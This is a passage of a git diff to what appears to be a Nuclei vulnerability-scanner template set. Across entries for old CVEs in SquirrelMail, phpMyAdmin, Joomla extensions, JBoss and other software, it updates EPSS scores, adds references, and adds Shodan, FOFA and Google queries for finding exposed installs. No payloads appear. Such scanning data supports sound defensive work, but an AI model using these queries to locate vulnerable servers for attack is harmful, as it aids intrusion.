CVE-2001-0537 cwe-id: CWE-287 epss-score: 0.87683 - epss-percentile: 0.98569 + epss-percentile: 0.98644 cpe: cpe:2.3:o:cisco:ios:11.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2002/CVE-2002-1131.yaml b/http/cves/2002/CVE-2002-1131.yaml index 0949ff5738..872aa5b0f5 100644 --- a/http/cves/2002/CVE-2002-1131.yaml +++ b/http/cves/2002/CVE-2002-1131.yaml @@ -27,6 +27,9 @@ info: max-request: 5 vendor: squirrelmail product: squirrelmail + shodan-query: http.title:"squirrelmail" + fofa-query: title="squirrelmail" + google-query: intitle:"squirrelmail" tags: cve,cve2002,edb,xss,squirrelmail http: diff --git a/http/cves/2004/CVE-2004-1965.yaml b/http/cves/2004/CVE-2004-1965.yaml index c1f874a540..6da7d480f3 100644 --- a/http/cves/2004/CVE-2004-1965.yaml +++ b/http/cves/2004/CVE-2004-1965.yaml @@ -15,13 +15,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2004-1965 - http://marc.info/?l=bugtraq&m=108301983206107&w=2 - https://exchange.xforce.ibmcloud.com/vulnerabilities/15966 + - https://github.com/POORVAJA-195/Nuclei-Analysis-main classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2004-1965 cwe-id: NVD-CWE-Other epss-score: 0.0113 - epss-percentile: 0.84351 + epss-percentile: 0.84626 cpe: cpe:2.3:a:openbb:openbb:1.0.0_beta1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2005/CVE-2005-3344.yaml b/http/cves/2005/CVE-2005-3344.yaml index 89f0e31e60..18423be5d9 100644 --- a/http/cves/2005/CVE-2005-3344.yaml +++ b/http/cves/2005/CVE-2005-3344.yaml @@ -20,8 +20,8 @@ info: cvss-score: 10 cve-id: CVE-2005-3344 cwe-id: NVD-CWE-Other - epss-score: 0.02158 - epss-percentile: 0.88203 + epss-score: 0.01539 + epss-percentile: 0.87085 cpe: cpe:2.3:a:horde:horde:3.0.4:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2005/CVE-2005-3634.yaml b/http/cves/2005/CVE-2005-3634.yaml index 4488b0a43c..0096019484 100644 --- a/http/cves/2005/CVE-2005-3634.yaml +++ b/http/cves/2005/CVE-2005-3634.yaml @@ -23,13 +23,14 @@ info: cve-id: CVE-2005-3634 cwe-id: NVD-CWE-Other epss-score: 0.02843 - epss-percentile: 0.897 + epss-percentile: 0.90695 cpe: cpe:2.3:a:sap:sap_web_application_server:6.10:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sap product: sap_web_application_server shodan-query: html:"SAP Business Server Pages Team" + fofa-query: body="sap business server pages team" tags: cve,cve2005,sap,redirect,business,xss http: diff --git a/http/cves/2006/CVE-2006-2842.yaml b/http/cves/2006/CVE-2006-2842.yaml index 87657dbf27..e395c6e2c0 100644 --- a/http/cves/2006/CVE-2006-2842.yaml +++ b/http/cves/2006/CVE-2006-2842.yaml @@ -20,13 +20,16 @@ info: cvss-score: 7.5 cve-id: CVE-2006-2842 cwe-id: CWE-22 - epss-score: 0.25691 - epss-percentile: 0.9628 + epss-score: 0.28102 + epss-percentile: 0.96839 cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: squirrelmail product: squirrelmail + shodan-query: http.title:"squirrelmail" + fofa-query: title="squirrelmail" + google-query: intitle:"squirrelmail" tags: cve,cve2006,lfi,squirrelmail,edb http: diff --git a/http/cves/2007/CVE-2007-0885.yaml b/http/cves/2007/CVE-2007-0885.yaml index f3c5829a6c..6c0e74c380 100644 --- a/http/cves/2007/CVE-2007-0885.yaml +++ b/http/cves/2007/CVE-2007-0885.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2007-0885 cwe-id: NVD-CWE-Other epss-score: 0.0093 - epss-percentile: 0.82626 + epss-percentile: 0.82973 cpe: cpe:2.3:a:rainbow_portal:rainbow.zen:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2007/CVE-2007-3010.yaml b/http/cves/2007/CVE-2007-3010.yaml index 1a29f75867..df6e5d5321 100644 --- a/http/cves/2007/CVE-2007-3010.yaml +++ b/http/cves/2007/CVE-2007-3010.yaml @@ -21,8 +21,8 @@ info: cvss-score: 10 cve-id: CVE-2007-3010 cwe-id: CWE-20 - epss-score: 0.97317 - epss-percentile: 0.99868 + epss-score: 0.97313 + epss-percentile: 0.99874 cpe: cpe:2.3:a:alcatel-lucent:omnipcx:7.1:*:enterprise:*:*:*:*:* metadata: verified: true @@ -31,6 +31,7 @@ info: product: omnipcx shodan-query: title:"OmniPCX for Enterprise" fofa-query: app="Alcatel_Lucent-OmniPCX-Enterprise" + google-query: intitle:"omnipcx for enterprise" tags: cve,cve2007,kev,rce,alcatel http: diff --git a/http/cves/2007/CVE-2007-4504.yaml b/http/cves/2007/CVE-2007-4504.yaml index a2a1196510..90debd42bc 100644 --- a/http/cves/2007/CVE-2007-4504.yaml +++ b/http/cves/2007/CVE-2007-4504.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5 cve-id: CVE-2007-4504 cwe-id: CWE-22 - epss-score: 0.02599 - epss-percentile: 0.90043 + epss-score: 0.02171 + epss-percentile: 0.89338 cpe: cpe:2.3:a:joomla:rsfiles:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2007/CVE-2007-4556.yaml b/http/cves/2007/CVE-2007-4556.yaml index aee2258ec2..baf5a3a9e8 100644 --- a/http/cves/2007/CVE-2007-4556.yaml +++ b/http/cves/2007/CVE-2007-4556.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.8 cve-id: CVE-2007-4556 cwe-id: NVD-CWE-Other - epss-score: 0.16469 - epss-percentile: 0.95873 + epss-score: 0.21361 + epss-percentile: 0.96419 cpe: cpe:2.3:a:opensymphony:xwork:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2007/CVE-2007-5728.yaml b/http/cves/2007/CVE-2007-5728.yaml index fe0f7b48ec..b69164999f 100644 --- a/http/cves/2007/CVE-2007-5728.yaml +++ b/http/cves/2007/CVE-2007-5728.yaml @@ -28,6 +28,8 @@ info: vendor: phppgadmin product: phppgadmin shodan-query: http.title:"phpPgAdmin" + fofa-query: title=phppgadmin + google-query: intitle:phppgadmin tags: cve2007,cve,xss,pgadmin,phppgadmin,edb http: diff --git a/http/cves/2008/CVE-2008-1061.yaml b/http/cves/2008/CVE-2008-1061.yaml index b395ef595b..a08f7e1a9d 100644 --- a/http/cves/2008/CVE-2008-1061.yaml +++ b/http/cves/2008/CVE-2008-1061.yaml @@ -22,14 +22,13 @@ info: cve-id: CVE-2008-1061 cwe-id: CWE-79 epss-score: 0.00663 - epss-percentile: 0.77516 + epss-percentile: 0.7961 cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: wordpress product: sniplets_plugin tags: cve2008,cve,xss,wp-plugin,wp,edb,wpscan,wordpress,sniplets - flow: http(1) && http(2) http: diff --git a/http/cves/2008/CVE-2008-1547.yaml b/http/cves/2008/CVE-2008-1547.yaml index 95335e8942..74805a9031 100644 --- a/http/cves/2008/CVE-2008-1547.yaml +++ b/http/cves/2008/CVE-2008-1547.yaml @@ -29,6 +29,8 @@ info: vendor: microsoft product: exchange_server shodan-query: http.title:"Outlook" + fofa-query: title="outlook" + google-query: intitle:"outlook" tags: cve2008,cve,redirect,owa,exchange,microsoft http: diff --git a/http/cves/2008/CVE-2008-2650.yaml b/http/cves/2008/CVE-2008-2650.yaml index 28a0666dd5..ba625d56d3 100644 --- a/http/cves/2008/CVE-2008-2650.yaml +++ b/http/cves/2008/CVE-2008-2650.yaml @@ -28,6 +28,7 @@ info: max-request: 1 vendor: cmsimple product: cmsimple + shodan-query: cpe:"cpe:2.3:a:cmsimple:cmsimple" tags: cve,cve2008,lfi,cmsimple http: diff --git a/http/cves/2008/CVE-2008-4764.yaml b/http/cves/2008/CVE-2008-4764.yaml index 0bce7f19c4..05e6784266 100644 --- a/http/cves/2008/CVE-2008-4764.yaml +++ b/http/cves/2008/CVE-2008-4764.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5 cve-id: CVE-2008-4764 cwe-id: CWE-22 - epss-score: 0.02365 - epss-percentile: 0.89577 + epss-score: 0.02135 + epss-percentile: 0.89239 cpe: cpe:2.3:a:extplorer:com_extplorer:*:rc2:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-5587.yaml b/http/cves/2008/CVE-2008-5587.yaml index 90bcd16ae0..dd7008fd98 100644 --- a/http/cves/2008/CVE-2008-5587.yaml +++ b/http/cves/2008/CVE-2008-5587.yaml @@ -21,13 +21,15 @@ info: cve-id: CVE-2008-5587 cwe-id: CWE-22 epss-score: 0.02331 - epss-percentile: 0.88625 + epss-percentile: 0.89734 cpe: cpe:2.3:a:phppgadmin:phppgadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: phppgadmin product: phppgadmin shodan-query: http.title:"phpPgAdmin" + fofa-query: title=phppgadmin + google-query: intitle:phppgadmin tags: cve,cve2008,lfi,phppgadmin,edb http: diff --git a/http/cves/2008/CVE-2008-6080.yaml b/http/cves/2008/CVE-2008-6080.yaml index cf7fc02a6b..1516da4d0f 100644 --- a/http/cves/2008/CVE-2008-6080.yaml +++ b/http/cves/2008/CVE-2008-6080.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2008-6080 cwe-id: CWE-22 epss-score: 0.03314 - epss-percentile: 0.90395 + epss-percentile: 0.9132 cpe: cpe:2.3:a:codecall:com_ionfiles:4.4.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-6172.yaml b/http/cves/2008/CVE-2008-6172.yaml index 4ae86e833b..428278c7bc 100644 --- a/http/cves/2008/CVE-2008-6172.yaml +++ b/http/cves/2008/CVE-2008-6172.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2008-6172 cwe-id: CWE-22 epss-score: 0.00509 - epss-percentile: 0.76096 + epss-percentile: 0.76498 cpe: cpe:2.3:a:weberr:rwcards:3.0.11:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-6222.yaml b/http/cves/2008/CVE-2008-6222.yaml index b7f61b6a45..ccaa6b1020 100644 --- a/http/cves/2008/CVE-2008-6222.yaml +++ b/http/cves/2008/CVE-2008-6222.yaml @@ -13,13 +13,14 @@ info: - https://www.exploit-db.com/exploits/6980 - https://nvd.nist.gov/vuln/detail/CVE-2008-6222 - https://exchange.xforce.ibmcloud.com/vulnerabilities/46356 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2008-6222 cwe-id: CWE-22 - epss-score: 0.01029 - epss-percentile: 0.82175 + epss-score: 0.01302 + epss-percentile: 0.85861 cpe: cpe:2.3:a:joomlashowroom:pro_desk_support_center:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-6465.yaml b/http/cves/2008/CVE-2008-6465.yaml index 76631b2aac..2130f00493 100644 --- a/http/cves/2008/CVE-2008-6465.yaml +++ b/http/cves/2008/CVE-2008-6465.yaml @@ -30,6 +30,8 @@ info: vendor: parallels product: h-sphere shodan-query: title:"Parallels H-Sphere + fofa-query: title="h-sphere" + google-query: intitle:"h-sphere" tags: cve,cve2008,xss,parallels,h-sphere http: diff --git a/http/cves/2008/CVE-2008-6668.yaml b/http/cves/2008/CVE-2008-6668.yaml index 0d5751fe14..79568e3231 100644 --- a/http/cves/2008/CVE-2008-6668.yaml +++ b/http/cves/2008/CVE-2008-6668.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2008-6668 cwe-id: CWE-22 epss-score: 0.00359 - epss-percentile: 0.71607 + epss-percentile: 0.72128 cpe: cpe:2.3:a:dirk_bartley:nweb2fax:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2008/CVE-2008-7269.yaml b/http/cves/2008/CVE-2008-7269.yaml index 8eaf2fb274..4f4712280f 100644 --- a/http/cves/2008/CVE-2008-7269.yaml +++ b/http/cves/2008/CVE-2008-7269.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.8 cve-id: CVE-2008-7269 cwe-id: CWE-20 - epss-score: 0.01425 - epss-percentile: 0.86241 + epss-score: 0.01544 + epss-percentile: 0.87118 cpe: cpe:2.3:a:boka:siteengine:5.0:*:*:*:*:*:*:* metadata: verified: "true" @@ -26,6 +26,7 @@ info: vendor: boka product: siteengine shodan-query: html:"SiteEngine" + fofa-query: body="siteengine" tags: cve,cve2008,redirect,siteengine,boka http: diff --git a/http/cves/2009/CVE-2009-0545.yaml b/http/cves/2009/CVE-2009-0545.yaml index f6f14d1199..986b065cd7 100644 --- a/http/cves/2009/CVE-2009-0545.yaml +++ b/http/cves/2009/CVE-2009-0545.yaml @@ -21,12 +21,15 @@ info: cve-id: CVE-2009-0545 cwe-id: CWE-20 epss-score: 0.97081 - epss-percentile: 0.99755 + epss-percentile: 0.99771 cpe: cpe:2.3:a:zeroshell:zeroshell:1.0:beta1:*:*:*:*:*:* metadata: max-request: 1 vendor: zeroshell product: zeroshell + shodan-query: http.title:"zeroshell" + fofa-query: title="zeroshell" + google-query: intitle:"zeroshell" tags: cve,cve2009,edb,zeroshell,kerbynet,rce http: diff --git a/http/cves/2009/CVE-2009-0932.yaml b/http/cves/2009/CVE-2009-0932.yaml index 4c4a3f433d..52f5de7570 100644 --- a/http/cves/2009/CVE-2009-0932.yaml +++ b/http/cves/2009/CVE-2009-0932.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2009-0932 cwe-id: CWE-22 epss-score: 0.04048 - epss-percentile: 0.919 + epss-percentile: 0.92091 cpe: cpe:2.3:a:debian:horde:3.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-1151.yaml b/http/cves/2009/CVE-2009-1151.yaml index b874ede337..acd906e9bd 100644 --- a/http/cves/2009/CVE-2009-1151.yaml +++ b/http/cves/2009/CVE-2009-1151.yaml @@ -20,13 +20,17 @@ info: cvss-score: 7.5 cve-id: CVE-2009-1151 cwe-id: CWE-94 - epss-score: 0.79256 - epss-percentile: 0.98197 + epss-score: 0.79939 + epss-percentile: 0.983 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: phpmyadmin product: phpmyadmin + shodan-query: http.title:"phpmyadmin" + fofa-query: title="phpmyadmin" + google-query: intitle:"phpmyadmin" + hunter-query: app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4" tags: cve,cve2009,deserialization,kev,vulhub,phpmyadmin,rce http: diff --git a/http/cves/2009/CVE-2009-1872.yaml b/http/cves/2009/CVE-2009-1872.yaml index fdad6c137f..a1fcfebec4 100644 --- a/http/cves/2009/CVE-2009-1872.yaml +++ b/http/cves/2009/CVE-2009-1872.yaml @@ -29,6 +29,8 @@ info: vendor: adobe product: coldfusion shodan-query: http.component:"Adobe ColdFusion" + fofa-query: title="coldfusion administrator login" + google-query: intitle:"coldfusion administrator login" tags: cve2009,cve,adobe,xss,coldfusion,tenable http: diff --git a/http/cves/2009/CVE-2009-2100.yaml b/http/cves/2009/CVE-2009-2100.yaml index 68f9595bb0..3ba409999f 100644 --- a/http/cves/2009/CVE-2009-2100.yaml +++ b/http/cves/2009/CVE-2009-2100.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5 cve-id: CVE-2009-2100 cwe-id: CWE-22 - epss-score: 0.00779 - epss-percentile: 0.80973 + epss-score: 0.02365 + epss-percentile: 0.89809 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-3318.yaml b/http/cves/2009/CVE-2009-3318.yaml index 4ab40ddac3..f77378d2c4 100644 --- a/http/cves/2009/CVE-2009-3318.yaml +++ b/http/cves/2009/CVE-2009-3318.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2009-3318 cwe-id: CWE-22 - epss-score: 0.00706 - epss-percentile: 0.79951 + epss-score: 0.01062 + epss-percentile: 0.84107 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-4202.yaml b/http/cves/2009/CVE-2009-4202.yaml index 303920760a..a9b7cb0a0e 100644 --- a/http/cves/2009/CVE-2009-4202.yaml +++ b/http/cves/2009/CVE-2009-4202.yaml @@ -14,18 +14,21 @@ info: - http://www.vupen.com/english/advisories/2009/1494 - https://nvd.nist.gov/vuln/detail/CVE-2009-4202 - http://www.exploit-db.com/exploits/8870 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2009-4202 cwe-id: CWE-22 - epss-score: 0.01956 - epss-percentile: 0.87449 + epss-score: 0.01917 + epss-percentile: 0.88567 cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomla product: joomla\! + shodan-query: http.html:"joomla! - open source content management" + fofa-query: body="joomla! - open source content management" tags: cve,cve2009,joomla,lfi,photo,edb http: diff --git a/http/cves/2009/CVE-2009-4223.yaml b/http/cves/2009/CVE-2009-4223.yaml index 22f0057f54..e7235dce6b 100644 --- a/http/cves/2009/CVE-2009-4223.yaml +++ b/http/cves/2009/CVE-2009-4223.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2009-4223 cwe-id: CWE-94 epss-score: 0.00611 - epss-percentile: 0.764 + epss-percentile: 0.78606 cpe: cpe:2.3:a:gianni_tommasi:kr-php_web_content_server:*:beta_2:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-5020.yaml b/http/cves/2009/CVE-2009-5020.yaml index eaeb45c307..bbf1e2c67b 100644 --- a/http/cves/2009/CVE-2009-5020.yaml +++ b/http/cves/2009/CVE-2009-5020.yaml @@ -11,18 +11,20 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2009-5020 - http://awstats.sourceforge.net/docs/awstats_changelog.txt + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:P cvss-score: 5.8 cve-id: CVE-2009-5020 cwe-id: CWE-20 - epss-score: 0.00215 - epss-percentile: 0.59474 + epss-score: 0.00253 + epss-percentile: 0.65112 cpe: cpe:2.3:a:awstats:awstats:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: awstats product: awstats + shodan-query: cpe:"cpe:2.3:a:laurent_destailleur:awstats" tags: cve2009,cve,redirect,awstats http: diff --git a/http/cves/2010/CVE-2010-0157.yaml b/http/cves/2010/CVE-2010-0157.yaml index 40caec65d8..df2d6fec55 100644 --- a/http/cves/2010/CVE-2010-0157.yaml +++ b/http/cves/2010/CVE-2010-0157.yaml @@ -18,13 +18,15 @@ info: cvss-score: 7.5 cve-id: CVE-2010-0157 cwe-id: CWE-22 - epss-score: 0.00826 - epss-percentile: 0.80104 + epss-score: 0.23423 + epss-percentile: 0.96555 cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomla product: joomla\! + shodan-query: http.html:"joomla! - open source content management" + fofa-query: body="joomla! - open source content management" tags: cve2010,cve,joomla,lfi,edb,packetstorm http: diff --git a/http/cves/2010/CVE-2010-0219.yaml b/http/cves/2010/CVE-2010-0219.yaml index 162fed1a75..502852583f 100644 --- a/http/cves/2010/CVE-2010-0219.yaml +++ b/http/cves/2010/CVE-2010-0219.yaml @@ -21,13 +21,14 @@ info: cve-id: CVE-2010-0219 cwe-id: CWE-255 epss-score: 0.97509 - epss-percentile: 0.99981 + epss-percentile: 0.99984 cpe: cpe:2.3:a:apache:axis2:1.3:*:*:*:*:*:*:* metadata: max-request: 2 vendor: apache product: axis2 shodan-query: http.html:"Apache Axis" + fofa-query: body="apache axis" tags: cve,cve2010,axis,apache,default-login,axis2 http: diff --git a/http/cves/2010/CVE-2010-0467.yaml b/http/cves/2010/CVE-2010-0467.yaml index 192e0ec010..e352e67234 100644 --- a/http/cves/2010/CVE-2010-0467.yaml +++ b/http/cves/2010/CVE-2010-0467.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-0467 cwe-id: CWE-22 epss-score: 0.06955 - epss-percentile: 0.93792 + epss-percentile: 0.93927 cpe: cpe:2.3:a:chillcreations:com_ccnewsletter:1.0.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0759.yaml b/http/cves/2010/CVE-2010-0759.yaml index 4619ccc6cf..38dd989db7 100644 --- a/http/cves/2010/CVE-2010-0759.yaml +++ b/http/cves/2010/CVE-2010-0759.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-0759 cwe-id: CWE-22 epss-score: 0.01569 - epss-percentile: 0.86974 + epss-percentile: 0.87232 cpe: cpe:2.3:a:greatjoomla:scriptegrator_plugin:1.4.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0942.yaml b/http/cves/2010/CVE-2010-0942.yaml index f40d55c22e..16f308ded0 100644 --- a/http/cves/2010/CVE-2010-0942.yaml +++ b/http/cves/2010/CVE-2010-0942.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-0942 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.75244 + epss-percentile: 0.75733 cpe: cpe:2.3:a:jvideodirect:com_jvideodirect:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0972.yaml b/http/cves/2010/CVE-2010-0972.yaml index ed8e98f25b..76737ccb6b 100644 --- a/http/cves/2010/CVE-2010-0972.yaml +++ b/http/cves/2010/CVE-2010-0972.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-0972 cwe-id: CWE-22 epss-score: 0.00813 - epss-percentile: 0.81406 + epss-percentile: 0.81755 cpe: cpe:2.3:a:g4j.laoneo:com_gcalendar:2.1.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1081.yaml b/http/cves/2010/CVE-2010-1081.yaml index 902e5d7506..dad40d4d75 100644 --- a/http/cves/2010/CVE-2010-1081.yaml +++ b/http/cves/2010/CVE-2010-1081.yaml @@ -12,13 +12,14 @@ info: - https://www.exploit-db.com/exploits/11511 - https://nvd.nist.gov/vuln/detail/CVE-2010-1081 - http://www.corejoomla.com/component/content/article/1-corejoomla-updates/40-community-polls-v153-security-release.html + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1081 cwe-id: CWE-22 - epss-score: 0.0168 - epss-percentile: 0.8632 + epss-score: 0.37754 + epss-percentile: 0.97206 cpe: cpe:2.3:a:corejoomla:com_communitypolls:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1305.yaml b/http/cves/2010/CVE-2010-1305.yaml index e805a95731..2935467205 100644 --- a/http/cves/2010/CVE-2010-1305.yaml +++ b/http/cves/2010/CVE-2010-1305.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1305 cwe-id: CWE-22 epss-score: 0.03203 - epss-percentile: 0.90236 + epss-percentile: 0.91191 cpe: cpe:2.3:a:joomlamo:com_jinventory:1.23.02:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1306.yaml b/http/cves/2010/CVE-2010-1306.yaml index 28fd60e49b..e1db833941 100644 --- a/http/cves/2010/CVE-2010-1306.yaml +++ b/http/cves/2010/CVE-2010-1306.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1306 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.85196 + epss-percentile: 0.85468 cpe: cpe:2.3:a:roberto_aloi:com_joomlapicasa2:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1307.yaml b/http/cves/2010/CVE-2010-1307.yaml index 118251644b..44202e9809 100644 --- a/http/cves/2010/CVE-2010-1307.yaml +++ b/http/cves/2010/CVE-2010-1307.yaml @@ -13,13 +13,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2010-1307 - http://www.vupen.com/english/advisories/2010/0806 - https://exchange.xforce.ibmcloud.com/vulnerabilities/57531 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1307 cwe-id: CWE-22 epss-score: 0.01751 - epss-percentile: 0.86604 + epss-percentile: 0.87931 cpe: cpe:2.3:a:software.realtyna:com_joomlaupdater:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1308.yaml b/http/cves/2010/CVE-2010-1308.yaml index 0910a8204d..cfc44ddf1c 100644 --- a/http/cves/2010/CVE-2010-1308.yaml +++ b/http/cves/2010/CVE-2010-1308.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1308 cwe-id: CWE-22 epss-score: 0.01334 - epss-percentile: 0.85765 + epss-percentile: 0.86023 cpe: cpe:2.3:a:la-souris-verte:com_svmap:1.1.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1312.yaml b/http/cves/2010/CVE-2010-1312.yaml index 07ceab2896..c673d75218 100644 --- a/http/cves/2010/CVE-2010-1312.yaml +++ b/http/cves/2010/CVE-2010-1312.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1312 cwe-id: CWE-22 epss-score: 0.01155 - epss-percentile: 0.83338 + epss-percentile: 0.84812 cpe: cpe:2.3:a:ijoomla:com_news_portal:1.5.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1313.yaml b/http/cves/2010/CVE-2010-1313.yaml index d274284b73..7e80d29d30 100644 --- a/http/cves/2010/CVE-2010-1313.yaml +++ b/http/cves/2010/CVE-2010-1313.yaml @@ -12,13 +12,14 @@ info: - https://www.exploit-db.com/exploits/12082 - https://nvd.nist.gov/vuln/detail/CVE-2010-1313 - http://www.exploit-db.com/exploits/12082 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N cvss-score: 4.3 cve-id: CVE-2010-1313 cwe-id: CWE-22 epss-score: 0.0045 - epss-percentile: 0.72402 + epss-percentile: 0.75061 cpe: cpe:2.3:a:seber:com_sebercart:1.0.0.12:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1353.yaml b/http/cves/2010/CVE-2010-1353.yaml index 74233ba758..5f0f38d9b7 100644 --- a/http/cves/2010/CVE-2010-1353.yaml +++ b/http/cves/2010/CVE-2010-1353.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1353 cwe-id: CWE-22 epss-score: 0.01751 - epss-percentile: 0.87665 + epss-percentile: 0.87931 cpe: cpe:2.3:a:wowjoomla:com_loginbox:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1354.yaml b/http/cves/2010/CVE-2010-1354.yaml index 889e71aa9f..ca5b99d766 100644 --- a/http/cves/2010/CVE-2010-1354.yaml +++ b/http/cves/2010/CVE-2010-1354.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1354 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73222 + epss-percentile: 0.75733 cpe: cpe:2.3:a:ternaria:com_vjdeo:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1429.yaml b/http/cves/2010/CVE-2010-1429.yaml index 29f5fdfb93..d659098372 100644 --- a/http/cves/2010/CVE-2010-1429.yaml +++ b/http/cves/2010/CVE-2010-1429.yaml @@ -30,6 +30,8 @@ info: vendor: redhat product: jboss_enterprise_application_platform shodan-query: title:"JBoss" + fofa-query: title="jboss" + google-query: intitle:"jboss" tags: cve2010,cve,jboss,eap,tomcat,exposure,redhat http: diff --git a/http/cves/2010/CVE-2010-1461.yaml b/http/cves/2010/CVE-2010-1461.yaml index 7cbc8e5249..9ccb1a4504 100644 --- a/http/cves/2010/CVE-2010-1461.yaml +++ b/http/cves/2010/CVE-2010-1461.yaml @@ -12,13 +12,14 @@ info: - https://www.exploit-db.com/exploits/12232 - https://nvd.nist.gov/vuln/detail/CVE-2010-1461 - http://www.exploit-db.com/exploits/12232 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1461 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73149 + epss-percentile: 0.75733 cpe: cpe:2.3:a:gogoritas:com_photobattle:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1469.yaml b/http/cves/2010/CVE-2010-1469.yaml index 2412d6d079..055b6fd1e4 100644 --- a/http/cves/2010/CVE-2010-1469.yaml +++ b/http/cves/2010/CVE-2010-1469.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1469 cwe-id: CWE-22 epss-score: 0.00813 - epss-percentile: 